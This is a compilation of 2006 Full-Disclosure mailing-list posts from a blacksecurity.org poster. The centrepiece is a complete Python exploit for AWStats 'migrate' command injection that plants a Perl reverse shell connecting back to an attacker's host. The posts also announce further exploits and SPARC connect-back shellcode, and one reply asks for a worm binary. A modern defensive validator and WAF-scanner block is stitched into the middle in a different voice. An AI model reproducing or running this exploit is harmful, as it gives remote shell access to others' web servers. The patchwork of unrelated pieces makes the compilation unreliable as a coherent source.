[Full-disclosure] [BL4CK] - BL4CK FR1D4Y 2006-07-21
Welcome to the zer0-day haulocaust.
Exploits - Take a step inside our oven.
Welcome to the zer0-day haulocaust.
Exploits - Take a step inside our oven.
Welcome to the zer0-day haulocaust.
Welcome to the zer0-day haulocaust.
...

(0mg, doesn't this silly poem sound familiar?)

Welcome to the first bl4ck fr1d4y. We have deemed this Friday our first bl4ck fr1d4y of the year. Attached are several fully functional proof of concepts that, for the most part, have not hit the security community, as well as fresh code for your eyes. This is our present to this year's Blackhat/Defcon 2006.

This Fr1d4y's releases:

-=[ Windows DHCP Client Broadcast Attack
    Functioning Remote Exploit for MS06-036
    by redsand

-=[ MDAC Code Execution in Internet Explorer
    Functioning Internet Explorer Exploit for MS06-014
    by redsand

-=[ Sendmail 8.13.5 and below Remote Signal Handling exploit
    Proof of Concept for the remote signal handling vulnerability
    by redsand

-=[ Solaris SPARC TCP Connect-Back Shellcode (with XNOR Encoded Session) and Client
    SPARC Assembly Shellcode - Connect-Back Shell with an encoded tcp session
    by xort

-=[ Cyrus Imapd - POP3D Exploit
    Functioning cyrus-imapd pop3d exploit that will bypass VA Randomization.
    Target host gentoo linux 2.6.16
    by bannedit

Until next time, k33p 1t r34l

This archive can be found at:
http://www.blacksecurity.org/download/61/BL4CK_FR1D4Y_2006-07-21

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Let's Not Forget Whose In Charge
I just wanted to remind everyone how this mailing list USED to be. Remember when it USED to be better? Cooler? Faster? Stronger? Back when all those nifty cool 1-day and 0-day exploits were dropped randomly just so we could watch the security industry scramble to take cover? Boy THOSE were the days!!!

http://blacksecurity.org

[EMAIL PROTECTED]:~$ head -n30 bl4ck_awstats_migrate_cmd_inj.py
#!/usr/bin/env python
# http://secunia.com/advisories/19969/
# by [EMAIL PROTECTED]
# May 5, 2006 - HAPPY CINCO DE MAYO
# HAPPY BIRTHDAY DAD
# private plz
#
# [EMAIL PROTECTED] ~/ $ nc -l -p 31337 -v
# listening on [any] 31337 ...
# connect to [65.99.197.147] from blacksecurity.org [65.99.197.147] 53377
# id
# uid=81(apache) gid=81(apache) groups=81(apache)
#

#!/usr/bin/env python
# http://secunia.com/advisories/19969/
# by [EMAIL PROTECTED]
# May 5, 2006 - HAPPY CINCO DE MAYO
# HAPPY BIRTHDAY DAD
# private plz
#
# [EMAIL PROTECTED] ~/ $ nc -l -p 31337 -v
# listening on [any] 31337 ...
# connect to [65.99.197.147] from blacksecurity.org [65.99.197.147] 53377
# id
# uid=81(apache) gid=81(apache) groups=81(apache)
#

import sys, socket, base64
import urllib2, urlparse, urllib

# perl 1 line tcp connect-back code
# needs ip & port
cmd = 'perl -e \'$h="%s";$p=%r;use Socket;$sp=inet_aton($h);$sa=sockaddr_in($p,$sp);;socket(CLIENT,PF_INET,SOCK_STREAM,getprotobyname("tcp"));gethostbyname($h);connect(CLIENT,$sa);open(STDIN,">&CLIENT");open(STDOUT,">&CLIENT");open(STDERR,">&CLIENT");if(fork()){exec "/bin/sh"; exit(0); };\''


class rbawstatsMigrate:
    __url = ''
    __user = ''
    __password = ''
    __auth = False
    __chost = False
    __cport = False

    def __init__(self, host=False, ur=False, ps=False, chost=False, cport=False):
        if host:
            self.__url = host
        if ur:
            self.__user = ur
        if ps:
            self.__password = ps
        if ur or ps:
            self.__auth = True
        if chost:
            self.__chost = chost
        if cport:
            self.__cport = cport

        # split the target URL and keep only the host part (drop any ";params")
        url = urlparse.urlsplit(self.__url)
        i = url[1].find(';')
        if i >= 0:
            self.__parsed_host = url[1][:i]
        else:
            self.__parsed_host = url[1]

    def probe(self):
        # resolve the connect-back host and build the injected command
        cphost = socket.gethostbyname_ex(self.__chost)
        my_cmd = cmd % (cphost[2][0], self.__cport)
        url_xpl = {
            "config": self.__parsed_host,
            "migrate": "|cd /tmp/ && %s|awstats052005.%s.txt" % (my_cmd, self.__parsed_host)
            # "migrate": "|cd /tmp/ && wget %s && chmod 777 %s && /tmp/%s|awstats052005.%s.txt" % (rsv, fname, fname, self.__parsed_host)
        }
        #if self.__url[len(self.__url) -1] != '?':
        #    url_xpl = '?' + url_xpl
        url = self.__url
        url_xpl = urllib.urlencode(url_xpl)
        try:
            req = urllib2.Request(url, url_xpl)
            if(self.__auth):
                b64str = base64.encodestring('%s:%s' % (self.__user, self.__password))[:-1]
                req.add_header('Authorization', "Basic %s" % b64str)
            req.add_header('Referer', "http://exploit.by.redsand.of.blacksecurity.org")
            req.add_header('Accept', 'text/xml,application/xml,application/xhtml+xml,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1')
            req.add_header('Accept-Language', 'en-us')
            req.add_header('Accept-Encoding', 'deflate, gzip')
            req.add_header('User-Agent', "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; [BL4CK] Security")
            req.add_header('Connection', 'Keep-Alive')
            req.add_header('Cache-Control', 'no-cache')
            q = urllib2.urlopen(req)
        except IOError, e:
            print "FAILED %s" % e
            sys.exit(0)
        print "SUCCESS, now check to see if it connected-back properly to %s:%s" % (self.__chost, self.__cport)
        sys.exit(0)


user = False
pas = False
url = False
chst = False
cprt = False

print "[BL4CK] AWStats CMD Injection Exploit by [EMAIL PROTECTED]"
print "http://secunia.com/advisories/19969/"
print "http://blacksecurity.org - f0r my h0mi3s"

argc = len(sys.argv)
if(argc <= 3):
    print "USAGE: %s http://host/awstats.pl [username] [password] " % sys.argv[0]
    print "\t\* Support 401 HTTP Authentication"
    sys.exit(0)
if(argc > 1):
    url = sys.argv[1]
if(argc > 2):
    chst = sys.argv[2]
if(argc > 3):
    cprt = sys.argv[3]
if(argc > 4):
    user = sys.argv[4]
if(argc > 5):
    pas = sys.argv[5]

red = rbawstatsMigrate(url, user, pas, chst, cprt)
red.probe()
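The script above works because the value of the AWStats `migrate` parameter, which should only ever be a file name, is allowed to carry pipe and shell separator characters into a command line. As an added, defender-side example (not code from the original post, and not AWStats' own fix), the Python 3 block below shows the two checks a web application or WAF should apply: an allow-list validator for the parameter, and a request-body scanner that flags any parameter whose decoded value contains shell metacharacters. The `awstats` file-name pattern, the sample request bodies and all function names are assumptions constructed for this example; the "malicious" body uses a harmless `id` where the post's payload would be.

```python
"""Defensive checks for the AWStats ``migrate`` command-injection pattern.

Constructed example, not code from the original post or from AWStats:
 1. migrate_param_is_safe(): allow-list validation a web app should apply
    before a user-supplied value reaches a shell or a file open.
 2. flag_request_body(): a WAF / log-pipeline style scanner over a
    URL-encoded POST body that reports parameters carrying shell
    metacharacters.
 3. triage_awstats_request(): both checks combined into one verdict.
"""
import re
from urllib.parse import parse_qs, urlencode

# Assumed shape of a legitimate migrate file name, modelled on the
# "awstats052005.<config>.txt" name the exploit appends to its payload:
# "awstats" + MMYYYY + "." + config name + ".txt".  Anything else is rejected.
MIGRATE_NAME_RE = re.compile(r"^awstats\d{6}\.[A-Za-z0-9._-]+\.txt$")

# Characters that let a value escape into the shell when interpolated into a
# command line: pipes, separators, redirections, substitution, newlines.
SHELL_META_RE = re.compile(r"[|;&`$<>\n\r(){}]")


def migrate_param_is_safe(value: str) -> bool:
    """Allow-list check: True only for a plain awstats migrate file name."""
    return MIGRATE_NAME_RE.fullmatch(value) is not None


def flag_request_body(body: str) -> list:
    """Parse a URL-encoded body and return (param, value) pairs whose value
    carries shell metacharacters.  parse_qs splits on '&' before decoding,
    so an encoded "%7C" (|) or "%26%26" (&&) is caught like the raw char."""
    hits = []
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            if SHELL_META_RE.search(value):
                hits.append((name, value))
    return hits


def triage_awstats_request(body: str) -> dict:
    """Combine both checks into a verdict a WAF rule or detection could emit.
    'block' is set when any parameter carries shell metacharacters or when a
    migrate value is present but does not match the allow-list."""
    params = parse_qs(body, keep_blank_values=True)
    migrate = params.get("migrate", [""])[0]
    flagged = flag_request_body(body)
    migrate_valid = migrate_param_is_safe(migrate) if migrate else None
    return {
        "migrate_valid": migrate_valid,
        "flagged_params": [name for name, _ in flagged],
        "block": bool(flagged) or (migrate_valid is False),
    }


# Constructed sample bodies, built the same way the exploit builds its POST
# (urlencode of a config/migrate pair).  The "malicious" one substitutes a
# harmless `id` for the connect-back payload.
BENIGN_BODY = urlencode({
    "config": "www.example.com",
    "migrate": "awstats052005.www.example.com.txt",
})
MALICIOUS_BODY = urlencode({
    "config": "www.example.com",
    "migrate": "|cd /tmp/ && id|awstats052005.www.example.com.txt",
})

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("malicious", MALICIOUS_BODY)):
        print(label, body)
        print("  ->", triage_awstats_request(body))
```

One caveat worth keeping in mind: the exploit sends its parameters in a POST body, which a default Apache access log never records, so this check has to run where the body is visible (in the application itself or in a WAF in front of it); grepping access logs for `migrate=|` would miss this traffic entirely.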
Re: [Full-disclosure] info about recent Ms issue
damn.. contex += 1;

-redsand

c0ntex wrote:
> On 14/04/06, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:
>> this is not a vulnerability for MS because the .hlp file is a script file and they believe that's not secured at all, c0ntex just posted a fresh advisory of something which has been found years ago, disclosed hundreds of times, but he looks to have time to lose.
>
> Where is the "heap overflow" in Windows Help that has been discussed thousands of times? I never once discussed the scriptable issue with .hlp files because that is not my interest, my interest is in manipulating process execution by overwriting memory.
>
> Your English is good enough to talk bollox but obviously not good enough to read.
>
> Anyway, 4 more Windows heap overflows coming on their way just awaiting your criticism :-)
>
> --
> regards
> c0ntex
[Full-disclosure] [ADVISORY] ~ +Thu Mar 16 14:09:26 EST 2006+ ~ Local Privilege Escalation Vulnerability in ISC BIND
[ADVISORY] ~ +Thu Mar 16 14:09:26 EST 2006+ ~ Local Privilege Escalation Vulnerability in ISC BIND

8===D

WORKAROUND

There were no identified workarounds.

CONTACT

redsand [EMAIL PROTECTED]
GSAE CEH SSP-CNSA GIPS CAP SSCP
[Full-disclosure] MS06-005 BMP WMPlayer Exploit
Okay, once again Black Tuesday has come and gone, and the race for exploits begins!!

MS06-005 was unsuccessful for me as it seems the exploit environment flops around like a trout out of water. I probably shouldn't be disclosing this since it's a non-working exploit, but here's something for someone else to work with. I'd really like to see a solution to this.

http://blacksecurity.org/~redsand/public/MS06-005/

Cheers!
redsand
Re: [Full-disclosure] BlackWorm technical information
does anyone have a binary they'd like to share ?

[EMAIL PROTECTED] wrote:
> "The worm has an interesting feature. When it infects a computer it opens a web browser on a certain webpage. This increments the counter on that webpage."
>
> not much information about this ?
>
> Gadi Evron wrote:
>> Technical information on the worm itself can be found here:
>> http://www.f-secure.com/v-descs/nyxem_e.shtml
>> and
>> http://blogs.securiteam.com/index.php/archives/229
>>
>> Gadi.
Re: [Full-disclosure] Security Bug in MSVC
like selling all my M$ Excel exploits

[EMAIL PROTECTED] wrote:
> and me
>
> I think most FD members are desperate at such newcomer comments; you have nothing interesting to say about his work, which he was doing before you were born.
>
> redsand wrote:
>> i think the author of this advisory is desperate for advisories or attention. either way he needs to open a disassembler and work on something else.
>>
>> Pavel Kankovsky wrote:
>>> On Tue, 17 Jan 2006, Morning Wood wrote:
>>>> extract, and open hello.dsw
>>>> click "batch build, build" or "rebuild all"
>>>> code will execute ( calc.exe and notepad.exe used as an example )
>>>
>>> What's the point of building a bunch of sources unless 1. you trust their author, or 2. you have made sure there is nothing malicious there?
>>>
>>> When you build an executable from untrusted sources, you get an untrusted executable. Either you run it and you're screwed anyway, or you don't run it and you wasted your time building it.
>>>
>>> (Indeed, there are some marginal cases like when you want to build an executable file intended to run on someone else's computer...)
>>>
>>> --Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ]
>>> "Resistance is futile. Open your source code and prepare for assimilation."
Re: [Full-disclosure] Security Bug in MSVC
i think the author of this advisory is desperate for advisories or attention. either way he needs to open a disassembler and work on something else.

Pavel Kankovsky wrote:
> On Tue, 17 Jan 2006, Morning Wood wrote:
>> extract, and open hello.dsw
>> click "batch build, build" or "rebuild all"
>> code will execute ( calc.exe and notepad.exe used as an example )
>
> What's the point of building a bunch of sources unless 1. you trust their author, or 2. you have made sure there is nothing malicious there?
>
> When you build an executable from untrusted sources, you get an untrusted executable. Either you run it and you're screwed anyway, or you don't run it and you wasted your time building it.
>
> (Indeed, there are some marginal cases like when you want to build an executable file intended to run on someone else's computer...)
>
> --Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ]
> "Resistance is futile. Open your source code and prepare for assimilation."